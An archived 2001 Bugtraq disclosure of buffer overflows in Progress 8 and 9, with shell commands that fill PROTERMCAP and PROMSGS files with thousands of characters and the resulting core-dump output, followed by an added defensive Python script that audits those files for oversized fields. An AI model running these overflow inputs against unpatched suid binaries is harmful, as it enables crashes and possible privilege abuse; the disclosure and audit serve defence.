Progress TERM (protermcap) overflows and PROMSGS overflows
daemon@ATHENA.MIT.EDU (KF)
Tue Oct 9 00:51:18 2001
Message-ID: <3BC20943.5A31653E@snosoft.com>
Date: Mon, 08 Oct 2001 16:14:59 -0400
From: KF <dotslash@snosoft.com>
MIME-Version: 1.0
To: bugtraq@security-focus.com
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Malformed termcaps and promsgs can overwrite memory on Progress versions 8 and 9. These are two separate issues, but the below examples show they can be used simultaneously in some cases. These have been patched to my knowledge; however, I do not know the patch numbers. Put a few thousand chars on each line and you should be able to crash most of the suid executables and plenty of others. Please note these issues are not related to the other 2 posts released this week. They were filed with Progress under different issue tickets and were addressed in fixes separately.
Malformed termcap entry:
v7kf|version 7 key functions:\
:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA....
:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA....
:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA....
[root@linux dlc]# echo "v7kf|version 7 key functions:\\" > term
[root@linux dlc]# echo :`perl -e 'print "A" x 3000'` >> term
[root@linux dlc]# echo :`perl -e 'print "A" x 3000'` >> term
[root@linux dlc]# echo :`perl -e 'print "A" x 3000'` >> term
[root@linux dlc]# export PROTERMCAP=./term
There are a few ways to set this off... you can make use of a bug in the PROMSGS. Here is the standard promsgs error for a bad term.
PROGRESS Version 9.1C as of Thu Jun 7 10:03:59 EDT 2001
Unable to use your terminal. Check your PROTERMCAP file. (443)
** Could not find terminal type xterm in file ./term. (146)
[root@linux dlc]# perl -e 'print "A" x 9000' > /tmp/promsgs
[root@linux dlc]# export PROMSGS=/tmp/promsgs
[root@linux dlc]# bin/pro
[PROGRESS ASCII-art banner]
Progress Software Corporation
14 Oak Park
Bedford, Massachusetts 01730
781-280-4000
PROGRESS is a registered trademark of Progress Software
Corporation
Copyright 1984-2001
by Progress Software Corporation
All Rights Reserved
PROGRESS Version 9.1C as of Thu Jun 7 10:03:59 EDT 2001
Error formatting messaage 96. Message file is corrupt.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24. Message file is corrupt.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
Error formatting messaage 146. Message file is corrupt.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 443
Error formatting messaage 49. Message file is corrupt.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 439
Quit (core dumped)
Here's the normal error when the termcap is wrong.
Unable to use your terminal. Check your PROTERMCAP file. (443)
** The protermcap file must contain :ce. (117)
** The protermcap file must contain :cl. (117)
** The protermcap file must contain :cm. (117)
Now for an example using just the termcap without tampering with PROMSGS...
[root@linux dlc]# echo :ce=`perl -e 'print "A" x 3000'` >> term
[root@linux dlc]# echo :cl=`perl -e 'print "A" x 3000'` >> term
[root@linux dlc]# echo :cm=`perl -e 'print "A" x 3000'` >> term
[root@linux dlc]# echo :ce=`perl -e 'print "A" x 9000'` >> term
[root@linux dlc]# export TERM=v7kf
[root@linux dlc]# bin/pro
PROGRESS Version 9.1C as of Thu Jun 7 10:03:59 EDT 2001
SYSTEM ERROR: strent request for more than 32K. (893)
Quit (core dumped)
It is also possible to crash suids using only the PROMSGS... I have a patched version at the moment so I can not demonstrate.
-KF
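The checks below are an added example, not KF's code or anything shipped by Progress: a small audit that parses a PROTERMCAP-style termcap file and a PROMSGS file and flags the conditions the post exercises (capability strings of thousands of bytes, an entry lacking the :ce/:cl/:cm capabilities error 117 demands, and oversized promsgs lines) before a suid Progress binary is ever pointed at them. The size limits MAX_CAP_LEN, MAX_ENTRY_LEN and MAX_PROMSGS_LINE are assumptions chosen well below the 32K that error 893 reports, not Progress-documented values, and the sample termcap entries are constructed for the example.

```python
# Added example: audit PROTERMCAP/PROMSGS files for oversized fields before a
# suid Progress binary parses them. Limits are assumptions, not Progress values:
# the post shows bin/pro aborting with "strent request for more than 32K" (893)
# once capability strings reach thousands of bytes.
MAX_CAP_LEN = 256                    # assumed: real escape sequences are tens of bytes
MAX_ENTRY_LEN = 4096                 # assumed: whole-entry budget, far below 32K
MAX_PROMSGS_LINE = 1024              # assumed: message templates are short
REQUIRED_CAPS = ("ce", "cl", "cm")   # error 117 in the post insists on these

def parse_termcap(text):
    """Join backslash-continued lines into entries and split each into (names, caps).
    Values are assumed to escape ':' as \\072, as termcap requires, so ':' is a safe separator."""
    entries, logical = [], []
    for line in (l.strip() for l in text.splitlines()):
        if not line or line.startswith("#"):
            continue
        logical.append(line[:-1] if line.endswith("\\") else line)
        if not line.endswith("\\"):          # entry complete on this line
            entries.append("".join(logical))
            logical = []
    if logical:                              # file ended inside a continued entry
        entries.append("".join(logical))
    split = [[f for f in e.split(":") if f] for e in entries]
    return [(fields[0].split("|"), fields[1:]) for fields in split if fields]

def audit_termcap(text):
    """Findings (strings) for entries that are oversized or lack required capabilities."""
    findings = []
    for names, caps in parse_termcap(text):
        name, present = names[0], {c.split("=", 1)[0] for c in caps}
        findings += [f"{name}: missing required capability :{r}" for r in REQUIRED_CAPS if r not in present]
        total = sum(len(c) for c in caps)
        if total > MAX_ENTRY_LEN:
            findings.append(f"{name}: entry totals {total} bytes (> {MAX_ENTRY_LEN})")
        findings += [f"{name}: capability {c[:6]!r}... is {len(c)} bytes (> {MAX_CAP_LEN})"
                     for c in caps if len(c) > MAX_CAP_LEN]
    return findings

def audit_promsgs(text):
    """Flag promsgs lines far longer than any legitimate message template."""
    return [f"promsgs line {n}: {len(line)} bytes (> {MAX_PROMSGS_LINE})"
            for n, line in enumerate(text.splitlines(), 1) if len(line) > MAX_PROMSGS_LINE]

# Constructed samples: a sane entry, and one shaped like the post's v7kf entry.
GOOD_TERMCAP = "xt|xterm sample:\\\n\t:ce=\\E[K:cl=\\E[H\\E[2J:cm=\\E[%i%d;%dH:\n"
BAD_TERMCAP = ("v7kf|version 7 key functions:\\\n"
               ":" + "A" * 3000 + ":\\\n"
               ":ce=" + "A" * 3000 + ":cl=\\E[H:cm=\\E[%i%d;%dH:\n")
```

Run audit_termcap on the file named by PROTERMCAP and audit_promsgs on the file named by PROMSGS as part of a pre-launch check; any finding means the files should not be handed to a suid binary.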